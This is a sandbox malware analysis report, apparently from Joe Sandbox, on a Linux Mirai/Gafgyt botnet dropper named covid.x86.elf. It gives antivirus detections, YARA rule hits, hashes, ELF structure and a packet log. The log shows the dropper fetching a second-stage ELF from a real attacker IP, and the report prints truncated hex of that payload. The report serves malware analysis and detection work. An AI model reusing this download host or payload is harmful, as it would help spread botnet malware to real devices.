/tmp/condi72	49%	ReversingLabs	Linux.Backdoor.Mirai
/tmp/condi72	33%	Virustotal		Browse

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.255.135.104	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.255.135.104	byte.mpsl.elf	Get hash	malicious	Mirai	Browse	/main_mpsl
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	hidakibest.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	hidakibest.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse
	main_x86.elf	Get hash	malicious	Mirai	Browse
	main_mpsl.elf	Get hash	malicious	Mirai	Browse
	Aqua.arm7.elf	Get hash	malicious	Mirai	Browse
	wind.spc.elf	Get hash	malicious	Mirai	Browse
	wind.arm6.elf	Get hash	malicious	Mirai	Browse
	wind.x86.elf	Get hash	malicious	Mirai	Browse
91.189.91.42	hidakibest.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	hidakibest.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	hidakibest.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse
	main_x86.elf	Get hash	malicious	Mirai	Browse
	main_mpsl.elf	Get hash	malicious	Mirai	Browse
	Aqua.arm7.elf	Get hash	malicious	Mirai	Browse
	wind.spc.elf	Get hash	malicious	Mirai	Browse
	wind.arm6.elf	Get hash	malicious	Mirai	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	hidakibest.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	hidakibest.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	91.189.91.42
	hidakibest.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	main_arm7.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	main_x86.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	main_mpsl.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	Aqua.arm7.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	wind.spc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
CANONICAL-ASGB	hidakibest.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	hidakibest.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	91.189.91.42
	hidakibest.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	main_arm7.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	main_x86.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	main_mpsl.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	Aqua.arm7.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	wind.spc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
SUPERSERVERSDATACENTERRU	byte.mpsl.elf	Get hash	malicious	Mirai	Browse	185.255.135.104
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	185.206.2.20
	http://osregist.xyz/tdrig/CNBR.html	Get hash	malicious	Unknown	Browse	185.255.135.223
	Clienter.dll.dll	Get hash	malicious	Unknown	Browse	185.40.4.94
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	147.78.65.71
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	147.78.65.71
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	147.78.65.71
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	147.78.65.71
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	147.78.65.71
	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	147.78.65.71
INIT7CH	hidakibest.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	hidakibest.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	109.202.202.202
	hidakibest.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	main_x86.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	main_mpsl.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	Aqua.arm7.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	wind.spc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	wind.arm6.elf	Get hash	malicious	Mirai	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/tmp/condi72

Download File

Process:	/tmp/covid.x86.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	88584
Entropy (8bit):	5.684346697015401
Encrypted:	false
SSDEEP:	1536:3X3tjY8fTTRbjBsGgm/GbrzLXn0srqrjPirJSCLIW:3ntjYcTTdmGgm/Gbn702qfPcAy
MD5:	61F7CF598443054E7648683E930330EB
SHA1:	7A28D37C2B9E012F03D323F8C7C8C23D3E63DFBE
SHA-256:	C209C53A8BB0ABA745376946D611F4B768B5E11049F53C0143C5BB452EF5577D
SHA-512:	CCA473747704092ABE12D6F41ACBA4E8DF2BD81EEE4C5F0F410A03F00CE82895E59AF18E4390EEAB9DA42BE4D018C7D7B8254123C4D455521AA6A0682C6741E2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/condi72, Author: Joe Security Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Source: /tmp/condi72, Author: unknown Rule: Linux_Trojan_Mirai_b14f4c5d, Description: unknown, Source: /tmp/condi72, Author: unknown Rule: Linux_Trojan_Mirai_5f7b67b8, Description: unknown, Source: /tmp/condi72, Author: unknown Rule: Linux_Trojan_Mirai_88de437f, Description: unknown, Source: /tmp/condi72, Author: unknown Rule: Linux_Trojan_Mirai_389ee3e9, Description: unknown, Source: /tmp/condi72, Author: unknown Rule: Linux_Trojan_Mirai_cc93863b, Description: unknown, Source: /tmp/condi72, Author: unknown Rule: Linux_Trojan_Mirai_8aa7b5d3, Description: unknown, Source: /tmp/condi72, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49% Antivirus: Virustotal, Detection: 33%, Browse
Reputation:	low
Preview:	.ELF....................d...4...xX......4. ...(......................................................G..`...........Q.td............................U..S........ ...h....C...[]..$............U.....=@....t..5................u.......t....h..............@........&....U..............Z.......t.Rj.hD...h......~............t........t....h............1.^....PTRh.p..h....QVhP.....................h....j..s...j.j.j.j........ @t.......j..]......j..S.........U..WVS....]...}...u..u]...p;.....t...~..e.[^_]..Y]...d;.....t+..u1....E.P....\|..^_j.P.9}....$...........j.....1..\....E...~...`...1...:Z.u..$...8Z.t.@9E.u...j..4.....$..........].%....SP...M.%....QP................S1................C......t..........t.QQj.P.\|.......XZ[......VS.....t$...\$..D$...t*.D$.:C.t).S.1....B.....8D$.t...A%....9.u.D$.[[^.3.......t.[[^.......WVS.....t$...\$..\|$ .D$...t-.D$.:C.t+.S.1....v..B.....8D$.t...A%....9.u.._[^_....t.D$.X[^_.9...............UWVS....\$4.t$0.\|$8...w.......[^_]..f..

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.476655159751213
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	covid.x86.elf
File size:	1'196 bytes
MD5:	525a61eb31c84f06ca81ac9dd3fc351c
SHA1:	b33103e0fd651148778f7b10a574ea7b3352f239
SHA256:	9056d031d3d7d225d98d14fb96f5dbf154457692ab7b3e536fab71dd1da2ad3d
SHA512:	765c0d780dc88fda4547edf6c70f8348614813338cbf53fc570379529bda671fac4a0c2acc3e6574e7bf6a397875447e73d7e610d1c9655fd4cd7312d3360ce8
SSDEEP:	24:Flx4MeFHxgxEmceZGQleZ3eLBzn/vYmRwyGues9OLruQ0uZxqXNfPc:fx4J+coGQlo3eLBTQ+qssnH5UNc
TLSH:	9121AF66E198ED32D62201F65286BF971395CED16017FF1B9D614802DD3A2D0C533379
File Content Preview:	.ELF....................$...4...........4. ...(.....................................................................Q.td............................U....U...E...........M...E........].....................................U......u.j..D........U......u.j../.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048324
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	996
Section Header Size:	40
Number of Section Headers:	5
Header String Table Index:	4

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x8048094	0x94	0x2e9	0x0	0x6	AX	4
.rodata	PROGBITS	0x804837d	0x37d	0x47	0x1	0x32	AMS	1
.bss	NOBITS	0x80493c4	0x3c4	0x4	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x3c4	0x1e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x3c4	0x3c4	5.8979	0x5	R E	0x1000	.text .rodata
LOAD	0x3c4	0x80493c4	0x80493c4	0x0	0x4	0.0000	0x6	RW	0x1000	.bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 16:22:40.989056110 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:40.994012117 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:40.994092941 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:40.994745970 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.000247955 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696140051 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696156979 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696167946 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696171999 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696225882 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696273088 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696281910 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696295977 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696306944 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696317911 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.696408033 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.696441889 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.696443081 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.701325893 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.701338053 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.701369047 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.701369047 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.701462984 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.701481104 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.701492071 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.701495886 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.701522112 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.701522112 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.814527035 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.814547062 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.814558029 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.814568996 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.814572096 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.814579964 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.814594030 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.814594030 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.814594030 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.814610004 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.814862013 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.814897060 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.815030098 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815064907 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.815068960 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815079927 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815095901 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.815118074 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815129042 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815407038 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.815917015 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815928936 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815939903 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815957069 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815967083 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.815975904 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.816513062 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.816806078 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.816817045 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.816828012 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.816837072 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.816848040 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.817090988 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.817574024 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.817584038 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.817594051 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.817687035 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.932498932 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932517052 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932534933 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932544947 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932563066 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932621002 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932631969 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932642937 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.932679892 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.933263063 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.933274031 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.933398962 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.933468103 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.933478117 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.933489084 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.933499098 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934014082 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934025049 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934035063 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934072971 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934082985 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934092999 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934103966 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934179068 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934422016 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.934979916 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.934990883 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.935002089 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.935012102 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.936311960 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:41.939292908 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.939316988 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.939327955 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.939336061 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:41.939913034 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:42.135992050 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:42.140963078 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.140980005 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.140993118 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141010046 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141021967 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141032934 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141046047 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141057014 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141067982 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.141321898 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:42.141326904 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:42.183098078 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:42.231097937 CET	43928	443	192.168.2.23	91.189.91.42
Jan 6, 2025 16:22:43.441448927 CET	42288	80	192.168.2.23	185.255.135.104
Jan 6, 2025 16:22:43.446315050 CET	80	42288	185.255.135.104	192.168.2.23
Jan 6, 2025 16:22:47.606508017 CET	42836	443	192.168.2.23	91.189.91.43
Jan 6, 2025 16:22:49.142306089 CET	42516	80	192.168.2.23	109.202.202.202
Jan 6, 2025 16:23:03.220371962 CET	43928	443	192.168.2.23	91.189.91.42
Jan 6, 2025 16:23:13.458852053 CET	42836	443	192.168.2.23	91.189.91.43
Jan 6, 2025 16:23:19.602108002 CET	42516	80	192.168.2.23	109.202.202.202
Jan 6, 2025 16:23:44.174715996 CET	43928	443	192.168.2.23	91.189.91.42
Jan 6, 2025 16:24:04.651842117 CET	42836	443	192.168.2.23	91.189.91.43

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	42288	185.255.135.104	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:22:40.994745970 CET	45	OUT	GET /main_x86 HTTP/1.0 Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo
Jan 6, 2025 16:22:41.696140051 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 15:22:41 GMT Server: Apache/2.4.6 (CentOS) Last-Modified: Thu, 02 Jan 2025 08:25:43 GMT ETag: "15a08-62ab4e87cff6d" Accept-Ranges: bytes Content-Length: 88584 Connection: close Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 64 81 04 08 34 00 00 00 78 58 01 00 00 00 00 00 34 00 20 00 03 00 28 00 0a 00 09 00 01 00 00 00 00 00 00 00 00 80 04 08 00 80 04 08 88 10 01 00 88 10 01 00 05 00 00 00 00 10 00 00 01 00 00 00 8c 10 01 00 8c a0 05 08 8c a0 05 08 ac 47 00 00 60 a1 00 00 06 00 00 00 00 10 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 55 89 e5 53 e8 13 00 00 00 81 c3 07 20 01 00 e8 68 00 00 00 e8 43 ef 00 00 5b 5d c3 8b 1c 24 c3 90 90 90 90 90 90 90 90 90 90 90 90 55 89 e5 83 ec 08 80 3d 40 e8 05 08 00 74 0c eb 35 83 c0 04 a3 c4 a0 05 08 ff d2 a1 c4 a0 05 08 8b 10 85 d2 75 eb b8 00 00 00 00 85 c0 74 10 83 ec 0c 68 88 90 05 08 e8 04 7f fb f7 83 c4 10 c6 05 40 e8 05 08 01 c9 c3 90 8d b4 26 00 00 00 00 55 b8 00 00 00 00 89 e5 83 ec 08 e8 00 00 00 00 5a 81 c2 84 1f 01 00 85 c0 74 15 52 6a 00 68 44 e8 05 08 68 88 90 05 08 e8 c3 7e fb f7 83 c4 10 a1 a0 a0 05 08 85 c0 74 16 b8 00 00 00 00 85 c0 74 0d [TRUNCATED] Data Ascii: ELFd4xX4 (G`QtdUS hC[]$U=@t5uth@&UZtRjhDh~tth1^PTRhphQVhPhjsjjjj @tj]jSUWVS]}uu]p;t~e[^_]Y]d;t+u1EP\|^_jP9}$j1\E~`1:Zu$8Zt@9Euj4$]%SPM%QPS1CttQQjP\|XZ[VSt$\$D$t*D$:Ct)S1B8D$tA%9uD$[[^3t[[^WVSt$\$\|$ D$t-D$:Ct+S1vB8D$tA%9u_[^_tD$X[^_9UWVS\$4t$0\|$8w[^_]f
Jan 6, 2025 16:22:41.696156979 CET	248	IN	Data Raw: c1 c8 08 c1 c8 10 66 c1 c8 08 83 fb 04 89 07 74 e1 8a 46 04 83 fb 05 88 47 04 74 d6 8a 46 05 88 47 05 84 c0 74 cc 8d 53 fa 89 54 24 10 31 d2 88 c2 8d 04 92 39 44 24 10 72 b8 50 50 6a 18 52 e8 06 a8 00 00 83 c4 10 89 47 08 85 c0 74 a4 8d 6e 06 80 Data Ascii: ftFGtFGtST$19D$rPPjRGtntmD$D$T$ADADofDT$BBD$@D$D$D$1G;D$wi)D$\$EGu1%QQjP
Jan 6, 2025 16:22:41.696167946 CET	1236	IN	Data Raw: 5a a7 00 00 83 c4 10 89 c2 89 47 10 85 c0 0f 84 f2 fe ff ff 80 7f 0c 00 74 d4 83 7c 24 10 01 0f 84 de 00 00 00 8a 45 01 88 42 04 83 7c 24 10 02 0f 84 cd 00 00 00 8a 45 02 8b 74 24 10 83 ee 03 88 c2 89 74 24 14 81 e2 ff 00 00 00 89 d6 39 54 24 14 Data Ascii: ZGt\|$EB\|$Et$t$9T$D$D$%\$W@QQjPT$GkRVUPD$@D$1G;D$/\$)t<.t$Wt$D2t A\$
Jan 6, 2025 16:22:41.696171999 CET	248	IN	Data Raw: 81 e6 ff 00 00 00 8a 84 24 8c 00 00 00 89 44 24 10 50 e8 7f a2 00 00 89 44 24 18 6a 00 6a 02 57 56 e8 30 f9 ff ff 88 44 24 59 83 c4 20 68 ff ff 00 00 6a 03 57 56 e8 1b f9 ff ff 89 44 24 1c 6a 40 6a 04 57 56 e8 0c f9 ff ff 88 44 24 5c 83 c4 20 6a Data Ascii: $D$PD$jjWV0D$Y hjWVD$j@jWVD$\ jjWVD$MhjWVD$0 hjWVD$$hjWVD$8 hjWVD$,jjWVD$@ jjWVD$4jjWV\|D$H jjWVj
Jan 6, 2025 16:22:41.696225882 CET	1236	IN	Data Raw: 89 44 24 3c 6a 00 6a 0f 57 56 e8 5b f8 ff ff 89 44 24 50 83 c4 20 6a 00 6a 10 57 56 e8 49 f8 ff ff 68 00 02 00 00 89 c5 6a 00 57 56 e8 39 f8 ff ff 89 44 24 64 83 c4 20 6a 01 6a 01 57 56 e8 27 f8 ff ff 88 44 24 5b a1 60 3b 06 08 50 6a 19 57 56 e8 Data Ascii: D$<jjWV[D$P jjWVIhjWV9D$d jjWV'D$[`;PjWVtD$ljjj]D$D@D$hjD$xPjjD$PP @D$T$L$fD$@D$fT$:fL$>D$hT$(L$D(T$CfL$TT$XL$0T$,
Jan 6, 2025 16:22:41.696273088 CET	248	IN	Data Raw: 6a 02 53 56 e8 99 f3 ff ff 88 44 24 47 83 c4 20 68 ff ff 00 00 6a 03 53 56 e8 84 f3 ff ff 89 44 24 24 6a 40 6a 04 53 56 e8 75 f3 ff ff 88 44 24 4a 83 c4 20 6a 01 6a 05 53 56 e8 63 f3 ff ff 88 44 24 3b 68 ff ff 00 00 6a 06 53 56 e8 51 f3 ff ff 89 Data Ascii: jSVD$G hjSVD$$j@jSVuD$J jjSVcD$;hjSVQD$8 hjSV<hjSV,D$P jjSVD$DjjSV `;RjSVD$,jjj?D$0@D$HjD$XPjjD$<P
Jan 6, 2025 16:22:41.696281910 CET	1236	IN	Data Raw: 83 c4 20 40 0f 84 74 01 00 00 89 f8 8b 54 24 14 8b 4c 24 18 88 44 24 35 8b 44 24 0c 66 89 54 24 28 66 89 4c 24 2c 66 89 6c 24 2e c7 44 24 48 00 00 00 00 85 c0 0f 8e 5b 01 00 00 8b 44 24 30 31 db 8d 50 34 8d 48 1c 66 89 54 24 36 8b 54 24 28 83 f2 Data Ascii: @tT$L$D$5D$fT$(fL$,fl$.D$H[D$01P4HfT$6T$(hfL$8fT$:;CF\$HD$,Cf\$HffD$.ffGf9\$fGPPjhKL$ D$XESD$7sC{,fD$FL$:ffCD$8Kf\|$+fC
Jan 6, 2025 16:22:41.696295977 CET	1236	IN	Data Raw: 44 24 38 6a 01 6a 0f 53 56 e8 e0 ed ff ff 89 44 24 4c 83 c4 20 6a 00 6a 10 53 56 e8 ce ed ff ff 89 c7 a1 60 3b 06 08 50 6a 19 53 56 e8 1d ee ff ff 89 44 24 60 83 c4 1c 6a 06 6a 03 6a 02 e8 06 8d 00 00 89 44 24 40 83 c4 10 40 0f 84 ce 03 00 00 c7 Data Ascii: D$8jjSVD$L jjSV`;PjSVD$`jjjD$@@D$XjD$hPjjD$LP @T$L$fT$6D$T$fL$:fD$<T$?D$XD$ L$T$fL$FD$HT$$L$(D$,d$T$IL$JD$K1
